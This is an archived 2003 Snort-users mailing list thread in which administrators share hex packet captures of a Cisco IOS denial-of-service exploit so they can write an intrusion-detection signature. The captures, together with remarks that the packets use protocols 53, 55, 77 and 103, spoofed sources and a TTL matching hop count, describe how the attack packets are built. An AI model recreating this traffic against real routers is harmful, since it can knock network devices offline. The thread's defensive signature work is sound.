[Snort-users] Anyone got a rule for the latest Cisco bug?

Matt Ploessel matt.ploessel at ...427...
Fri Jul 18 10:56:14 EDT 2003


Pat,

-----Forwarded Message-----
From: Keith Pachulski

Output below is from both the SC code and hping performing the same as
SC. Feel free to develop your signatures from it.

SC Exploit
11:59:59.014190 79.111.123.116 > dhcp9-1.noc.corp.ptd.net:  swipe 181
0x0000   4500 00c9 bf25 0000 0235 fe3b 4f6f 7b74        E....%...5.;Oo{t
0x0010   ccba 6301 0001 0203 0405 0607 0809 0a0b        ..c.............
0x0020   0c0d 0e0f 1011 1213 1415 1617 1819 1a1b        ................
0x0030   1c1d 1e1f 2021 2223 2425 2627 2829 2a2b        .....!"#$%&'()*+
0x0040   2c2d 2e2f 3031 3233 3435 3637 3839 3a3b        ,-./0123456789:;
0x0050   3c3d 3e3f 4041 4243 4445 4647 4849 4a4b        <=>?@ABCDEFGHIJK
0x0060   4c4d 4e4f 5051 5253 5455 5657 5859 5a5b        LMNOPQRSTUVWXYZ[
0x0070   5c5d 5e5f 6061 6263 6465 6667 6869 6a6b        \]^_`abcdefghijk
0x0080   6c6d 6e6f 7071 7273 7475 7677 7879 7a7b        lmnopqrstuvwxyz{
0x0090   7c7d 7e7f 8081 8283 8485 8687 8889 8a8b        |}~.............
0x00a0   8c8d 8e8f 9091 9293 9495 9697 9899 9a9b        ................
0x00b0   9c9d 9e9f a0a1 a2a3 a4a5 a6a7 a8a9 aaab        ................
0x00c0   acad aeaf b0b1 b2b3 b4                         .........
11:59:59.014402 dhcp9-1.noc.corp.ptd.net > 79.111.123.116: icmp:
dhcp9-1.noc.corp.ptd.net protocol 53 unreachable [tos 0xc0] 

0x0000   45c0 00e5 80f8 0000 4001 fdc0 ccba 6301        E....... at ...9675...
0x0010   4f6f 7b74 0302 df39 0000 0000 4500 00c9        Oo{t...9....E...
0x0020   bf25 0000 0235 fe3b 4f6f 7b74 ccba 6301        .%...5.;Oo{t..c.
0x0030   0001 0203 0405 0607 0809 0a0b 0c0d 0e0f        ................
0x0040   1011 1213 1415 1617 1819 1a1b 1c1d 1e1f        ................
0x0050   2021 2223 2425 2627 2829 2a2b 2c2d 2e2f        .!"#$%&'()*+,-./
0x0060   3031 3233 3435 3637 3839 3a3b 3c3d 3e3f        0123456789:;<=>?
0x0070   4041 4243 4445 4647 4849 4a4b 4c4d 4e4f        @ABCDEFGHIJKLMNO
0x0080   5051 5253 5455 5657 5859 5a5b 5c5d 5e5f        PQRSTUVWXYZ[\]^_
0x0090   6061 6263 6465 6667 6869 6a6b 6c6d 6e6f        `abcdefghijklmno
0x00a0   7071 7273 7475 7677 7879 7a7b 7c7d 7e7f        pqrstuvwxyz{|}~.
0x00b0   8081 8283 8485 8687 8889 8a8b 8c8d 8e8f        ................
0x00c0   9091 9293 9495 9697 9899 9a9b 9c9d 9e9f        ................
0x00d0   a0a1 a2a3 a4a5 a6a7 a8a9 aaab acad aeaf        ................
0x00e0   b0b1 b2b3 b4                                   .....
11:59:59.014380 36.71.143.53 > dhcp9-1.noc.corp.ptd.net: mobile: [] 
(bad checksum 515)
0x0000   4500 00c9 fefc 0000 0237 d5c9 2447 8f35        E........7..$G.5
0x0010   ccba 6301 0001 0203 0405 0607 0809 0a0b        ..c.............
0x0020   0c0d 0e0f 1011 1213 1415 1617 1819 1a1b        ................
0x0030   1c1d 1e1f 2021 2223 2425 2627 2829 2a2b        .....!"#$%&'()*+
0x0040   2c2d 2e2f 3031 3233 3435 3637 3839 3a3b        ,-./0123456789:;
0x0050   3c3d 3e3f 4041 4243 4445 4647 4849 4a4b        <=>?@ABCDEFGHIJK
0x0060   4c4d 4e4f 5051 5253 5455 5657 5859 5a5b        LMNOPQRSTUVWXYZ[
0x0070   5c5d 5e5f 6061 6263 6465 6667 6869 6a6b        \]^_`abcdefghijk
0x0080   6c6d 6e6f 7071 7273 7475 7677 7879 7a7b        lmnopqrstuvwxyz{
0x0090   7c7d 7e7f 8081 8283 8485 8687 8889 8a8b        |}~.............
0x00a0   8c8d 8e8f 9091 9293 9495 9697 9899 9a9b        ................
0x00b0   9c9d 9e9f a0a1 a2a3 a4a5 a6a7 a8a9 aaab        ................
0x00c0   acad aeaf b0b1 b2b3 b4                         .........
11:59:59.014603 dhcp9-1.noc.corp.ptd.net > 36.71.143.53: icmp:
dhcp9-1.noc.corp.ptd.net protocol 55 unreachable [tos 0xc0] 

0x0000   45c0 00e5 5815 0000 4001 3e0b ccba 6301        E...X... at ...843...>...c.
0x0010   2447 8f35 0302 df39 0000 0000 4500 00c9        $G.5...9....E...
0x0020   fefc 0000 0237 d5c9 2447 8f35 ccba 6301        .....7..$G.5..c.
0x0030   0001 0203 0405 0607 0809 0a0b 0c0d 0e0f        ................
0x0040   1011 1213 1415 1617 1819 1a1b 1c1d 1e1f        ................
0x0050   2021 2223 2425 2627 2829 2a2b 2c2d 2e2f        .!"#$%&'()*+,-./
0x0060   3031 3233 3435 3637 3839 3a3b 3c3d 3e3f        0123456789:;<=>?
0x0070   4041 4243 4445 4647 4849 4a4b 4c4d 4e4f        @ABCDEFGHIJKLMNO
0x0080   5051 5253 5455 5657 5859 5a5b 5c5d 5e5f        PQRSTUVWXYZ[\]^_
0x0090   6061 6263 6465 6667 6869 6a6b 6c6d 6e6f        `abcdefghijklmno
0x00a0   7071 7273 7475 7677 7879 7a7b 7c7d 7e7f        pqrstuvwxyz{|}~.
0x00b0   8081 8283 8485 8687 8889 8a8b 8c8d 8e8f        ................
0x00c0   9091 9293 9495 9697 9899 9a9b 9c9d 9e9f        ................
0x00d0   a0a1 a2a3 a4a5 a6a7 a8a9 aaab acad aeaf        ................
0x00e0   b0b1 b2b3 b4                                   .....
11:59:59.014572 57.21.62.14 > dhcp9-1.noc.corp.ptd.net:  nd 181
0x0000   4500 00c9 bcb9 0000 024d 5450 3915 3e0e        E........MTP9.>.
0x0010   ccba 6301 0001 0203 0405 0607 0809 0a0b        ..c.............
0x0020   0c0d 0e0f 1011 1213 1415 1617 1819 1a1b        ................
0x0030   1c1d 1e1f 2021 2223 2425 2627 2829 2a2b        .....!"#$%&'()*+
0x0040   2c2d 2e2f 3031 3233 3435 3637 3839 3a3b        ,-./0123456789:;
0x0050   3c3d 3e3f 4041 4243 4445 4647 4849 4a4b        <=>?@ABCDEFGHIJK
0x0060   4c4d 4e4f 5051 5253 5455 5657 5859 5a5b        LMNOPQRSTUVWXYZ[
0x0070   5c5d 5e5f 6061 6263 6465 6667 6869 6a6b        \]^_`abcdefghijk
0x0080   6c6d 6e6f 7071 7273 7475 7677 7879 7a7b        lmnopqrstuvwxyz{
0x0090   7c7d 7e7f 8081 8283 8485 8687 8889 8a8b        |}~.............
0x00a0   8c8d 8e8f 9091 9293 9495 9697 9899 9a9b        ................
0x00b0   9c9d 9e9f a0a1 a2a3 a4a5 a6a7 a8a9 aaab        ................
0x00c0   acad aeaf b0b1 b2b3 b4                         .........
11:59:59.014837 dhcp9-1.noc.corp.ptd.net > 57.21.62.14: icmp:
dhcp9-1.noc.corp.ptd.net protocol 77 unreachable [tos 0xc0] 

0x0000   45c0 00e5 8357 0000 4001 4f22 ccba 6301        E....W.. at ...9676..."..c.
0x0010   3915 3e0e 0302 df39 0000 0000 4500 00c9        9.>....9....E...
0x0020   bcb9 0000 024d 5450 3915 3e0e ccba 6301        .....MTP9.>...c.
0x0030   0001 0203 0405 0607 0809 0a0b 0c0d 0e0f        ................
0x0040   1011 1213 1415 1617 1819 1a1b 1c1d 1e1f        ................
0x0050   2021 2223 2425 2627 2829 2a2b 2c2d 2e2f        .!"#$%&'()*+,-./
0x0060   3031 3233 3435 3637 3839 3a3b 3c3d 3e3f        0123456789:;<=>?
0x0070   4041 4243 4445 4647 4849 4a4b 4c4d 4e4f        @ABCDEFGHIJKLMNO
0x0080   5051 5253 5455 5657 5859 5a5b 5c5d 5e5f        PQRSTUVWXYZ[\]^_
0x0090   6061 6263 6465 6667 6869 6a6b 6c6d 6e6f        `abcdefghijklmno
0x00a0   7071 7273 7475 7677 7879 7a7b 7c7d 7e7f        pqrstuvwxyz{|}~.
0x00b0   8081 8283 8485 8687 8889 8a8b 8c8d 8e8f        ................
0x00c0   9091 9293 9495 9697 9899 9a9b 9c9d 9e9f        ................
0x00d0   a0a1 a2a3 a4a5 a6a7 a8a9 aaab acad aeaf        ................
0x00e0   b0b1 b2b3 b4                                   .....
11:59:59.015060 43.53.57.126 > dhcp9-1.noc.corp.ptd.net: pim v0
0x0000   4500 00c9 2404 0000 0267 ff5b 2b35 397e        E...$....g.[+59~
0x0010   ccba 6301 0001 0203 0405 0607 0809 0a0b        ..c.............
0x0020   0c0d 0e0f 1011 1213 1415 1617 1819 1a1b        ................
0x0030   1c1d 1e1f 2021 2223 2425 2627 2829 2a2b        .....!"#$%&'()*+
0x0040   2c2d 2e2f 3031 3233 3435 3637 3839 3a3b        ,-./0123456789:;
0x0050   3c3d 3e3f 4041 4243 4445 4647 4849 4a4b        <=>?@ABCDEFGHIJK
0x0060   4c4d 4e4f 5051 5253 5455 5657 5859 5a5b        LMNOPQRSTUVWXYZ[
0x0070   5c5d 5e5f 6061 6263 6465 6667 6869 6a6b        \]^_`abcdefghijk
0x0080   6c6d 6e6f 7071 7273 7475 7677 7879 7a7b        lmnopqrstuvwxyz{
0x0090   7c7d 7e7f 8081 8283 8485 8687 8889 8a8b        |}~.............
0x00a0   8c8d 8e8f 9091 9293 9495 9697 9899 9a9b        ................
0x00b0   9c9d 9e9f a0a1 a2a3 a4a5 a6a7 a8a9 aaab        ................
0x00c0   acad aeaf b0b1 b2b3 b4                         .........
11:59:59.015239 dhcp9-1.noc.corp.ptd.net > 43.53.57.126: icmp:
dhcp9-1.noc.corp.ptd.net protocol 103 unreachable [tos 0xc0] 

0x0000   45c0 00e5 65bf 0000 4001 7f2a ccba 6301        E...e... at ...846...*..c.
0x0010   2b35 397e 0302 df39 0000 0000 4500 00c9        +59~...9....E...
0x0020   2404 0000 0267 ff5b 2b35 397e ccba 6301        $....g.[+59~..c.
0x0030   0001 0203 0405 0607 0809 0a0b 0c0d 0e0f        ................
0x0040   1011 1213 1415 1617 1819 1a1b 1c1d 1e1f        ................
0x0050   2021 2223 2425 2627 2829 2a2b 2c2d 2e2f        .!"#$%&'()*+,-./
0x0060   3031 3233 3435 3637 3839 3a3b 3c3d 3e3f        0123456789:;<=>?
0x0070   4041 4243 4445 4647 4849 4a4b 4c4d 4e4f        @ABCDEFGHIJKLMNO
0x0080   5051 5253 5455 5657 5859 5a5b 5c5d 5e5f        PQRSTUVWXYZ[\]^_
0x0090   6061 6263 6465 6667 6869 6a6b 6c6d 6e6f        `abcdefghijklmno
0x00a0   7071 7273 7475 7677 7879 7a7b 7c7d 7e7f        pqrstuvwxyz{|}~.
0x00b0   8081 8283 8485 8687 8889 8a8b 8c8d 8e8f        ................
0x00c0   9091 9293 9495 9697 9899 9a9b 9c9d 9e9f        ................
0x00d0   a0a1 a2a3 a4a5 a6a7 a8a9 aaab acad aeaf        ................
0x00e0   b0b1 b2b3 b4                                   .....

HPING
11:56:40.024194 dhcp9-52.noc.corp.ptd.net > dhcp9-1.noc.corp.ptd.net: 
swipe 0
0x0000   4500 0014 9f64 0000 0235 b9a6 ccba 6334        E....d...5....c4
0x0010   ccba 6301 0000 0000 0000 0000 0000 0000        ..c.............
0x0020   0000 0000 0000 0000 0000 0000 0000             ..............
11:56:40.024731 dhcp9-1.noc.corp.ptd.net > dhcp9-52.noc.corp.ptd.net:
icmp: dhcp9-1.noc.corp.ptd.net protocol 53 unreachable [tos 0xc0] 

0x0000   45c0 0030 29df 0000 4001 f083 ccba 6301        E..0)... at ...9675...
0x0010   ccba 6334 0302 fcfd 0000 0000 4500 0014        ..c4........E...
0x0020   9f64 0000 0235 b9a6 ccba 6334 ccba 6301        .d...5....c4..c.
11:57:26.534797 dhcp9-52.noc.corp.ptd.net > dhcp9-1.noc.corp.ptd.net: 
nd 0
0x0000   4500 0014 38fa 0000 024d 1ff9 ccba 6334        E...8....M....c4
0x0010   ccba 6301 0000 0000 0000 0000 0000 0000        ..c.............
0x0020   0000 0000 0000 0000 0000 0000 0000             ..............
11:57:26.534898 dhcp9-1.noc.corp.ptd.net > dhcp9-52.noc.corp.ptd.net:
icmp: dhcp9-1.noc.corp.ptd.net protocol 77 unreachable [tos 0xc0] 

0x0000   45c0 0030 29e1 0000 4001 f081 ccba 6301        E..0)... at ...9675...
0x0010   ccba 6334 0302 fcfd 0000 0000 4500 0014        ..c4........E...
0x0020   38fa 0000 024d 1ff9 ccba 6334 ccba 6301        8....M....c4..c.
11:57:39.829722 dhcp9-52.noc.corp.ptd.net > dhcp9-1.noc.corp.ptd.net:
pim v0
0x0000   4500 0014 368f 0000 0267 224a ccba 6334        E...6....g"J..c4
0x0010   ccba 6301 0000 0000 0000 0000 0000 0000        ..c.............
0x0020   0000 0000 0000 0000 0000 0000 0000             ..............
11:57:39.829814 dhcp9-1.noc.corp.ptd.net > dhcp9-52.noc.corp.ptd.net:
icmp: dhcp9-1.noc.corp.ptd.net protocol 103 unreachable [tos 0xc0] 

0x0000   45c0 0030 29e2 0000 4001 f080 ccba 6301        E..0)... at ...9675...
0x0010   ccba 6334 0302 fcfd 0000 0000 4500 0014        ..c4........E...
0x0020   368f 0000 0267 224a ccba 6334 ccba 6301        6....g"J..c4..c.
11:57:52.245620 dhcp9-52.noc.corp.ptd.net > dhcp9-1.noc.corp.ptd.net:
[|mobile]
0x0000   4500 0014 96be 0000 0237 c24a ccba 6334        E........7.J..c4
0x0010   ccba 6301 0000 0000 0000 0000 0000 0000        ..c.............
0x0020   0000 0000 0000 0000 0000 0000 0000             ..............
11:57:52.245699 dhcp9-1.noc.corp.ptd.net > dhcp9-52.noc.corp.ptd.net:
icmp: dhcp9-1.noc.corp.ptd.net protocol 55 unreachable [tos 0xc0] 

0x0000   45c0 0030 29e3 0000 4001 f07f ccba 6301        E..0)... at ...9675...
0x0010   ccba 6334 0302 fcfd 0000 0000 4500 0014        ..c4........E...
0x0020   96be 0000 0237 c24a ccba 6334 ccba 6301        .....7.J..c4..c.

|Keith A. Pachulski, PPS, GCIH, GCFW | NSA IATF Member| FBI InfraGard
Secure Member|
|PenTeleData/Prolog Internet Services | Information Security & Privacy| 
|6B56 C8DC 6201 6D1A BFF5 5799 E193 ABAA 9549 74D0| "In God We Trust - -

|- All Others We Monitor"|
|--- United States Navy Intelligence|



...

Matt Ploessel
Network Security Engineer
Foundstone, Inc.
Strategic Security

949.297.5622 Tel 
949.297.5575 Fax 

http://www.foundstone.com
PGP: https://www.foundstone.com/pgpkeys/matt_ploessel.asc
PGP Hash: 5233 27A0 E504 2887 0F6F 0218 7495 1EB2 F182 E914

This email may contain confidential and privileged information for the
sole use of the intended recipient. Content disclosure to third parties
is strictly prohibited. Verify sender and message body authenticity
against the above PGP key only, retrieved via a secure and dependable
method. Thank you.


> -----Original Message-----
> From: Donahue, Pat [mailto:PDonahue at ...9678...] 
> Sent: Friday, July 18, 2003 9:53 AM
> To: Erek Adams; Du Feu, Richard
> Cc: snort-users at lists.sourceforge.net
> Subject: RE: [Snort-users] Anyone got a rule for the latest Cisco bug?
> 
> 
> Speaking of which, has anyone been able to obtain a full 
> packet capture? There's probably not too much to those 184 
> bytes, but I'd be interested in seeing the payload as well as 
> the packet headers. Anyway, the simple fix seems to be as 
> always keeping your IOS up to date with the 12.3 branch.
> 
> --
> Patrick Donahue
> Network/Systems Administrator
> ACMI Corporation
> 
> -----Original Message-----
> From: Erek Adams [mailto:erek at ...950...]
> Sent: Friday, July 18, 2003 5:30 AM
> To: Du Feu, Richard
> Cc: snort-users at lists.sourceforge.net
> Subject: RE: [Snort-users] Anyone got a rule for the latest Cisco bug?
> 
> 
> On Fri, 18 Jul 2003, Du Feu, Richard wrote:
> 
> > I'm fairly new to snort and am not yet good at writing 
> rules for it, 
> > however I do have a packet capture of an attack against a cisco 
> > device. This is the exploit released on netssys. It looks 
> roughly like 
> > this:
> >
> > 09:45:29.846575 8.145.50.78 > a.b.c.d:  ip-proto-53 26 [ttl 1] (id 
> > 17168, len 46) 09:45:29.846738 0.246.255.32 > a.b.c.d: mobile 
> > 0.246.255.32 > a.b.c.d: [] > 4.5.6.7 (oproto=0) (bad checksum 515) 
> > [ttl 1] (id 6925, len 46) 09:45:29.846770 201.211.15.73 > 
> a.b.c.d:  nd 
> > 26 [ttl 1] (id 38906, len 46) 09:45:29.846795 61.81.217.4 > 
> a.b.c.d: 
> > pim v0 [ttl 1] (id 8220, len 46)
> >
> > The ttl needs to be the number of hops to the target system. The 
> > source IPs are spoofed. Is this enough for someone who is 
> clued up to 
> > write a rule for it?
> 
> It's something to start with, but it's not quite enough to 
> get a really good sig.  A "full" packet capture of the entire 
> packet would be the best thing.  Granted, these are small 
> packets but it's still nice to have. Besides, who doesn't 
> like to read hex?!?  :)
> 
> Cheers!
> 
> -----
> Erek Adams
> 
>    "When things get weird, the weird turn pro."   H.S. Thompson
> 
> 
> -------------------------------------------------------
> This SF.net email is sponsored by: VM Ware
> With VMware you can run multiple operating systems on a 
> single machine. WITHOUT REBOOTING! Mix Linux / Windows / 
> Novell virtual machines at the same time. Free trial click 
> here: http://www.vmware.com/wl/offer/345/0
> _______________________________________________
> Snort-users mailing list
> Snort-users at lists.sourceforge.net
> Go to this URL to change user options or unsubscribe: 
> https://lists.sourceforge.net/lists/listinfo/s> nort-users
> 
> Snort-users list archive: 
> http://www.geocrawler.com/redir-sf.php3?list=snort-users
> 
> 
> -------------------------------------------------------
> This SF.net email is sponsored by: VM Ware
> With VMware you can run multiple operating systems on a 
> single machine. WITHOUT REBOOTING! Mix Linux / Windows / 
> Novell virtual machines at the same time. Free trial click 
> here: http://www.vmware.com/wl/offer/345/0
> _______________________________________________
> Snort-users mailing list
> Snort-users at lists.sourceforge.net
> Go to this URL to change user options or unsubscribe: 
> https://lists.sourceforge.net/lists/listinfo/s> nort-users
> 
> Snort-users list archive: 
> http://www.geocrawler.com/redir-sf.php3?list=ort-users
> 




More information about the Snort-users mailing list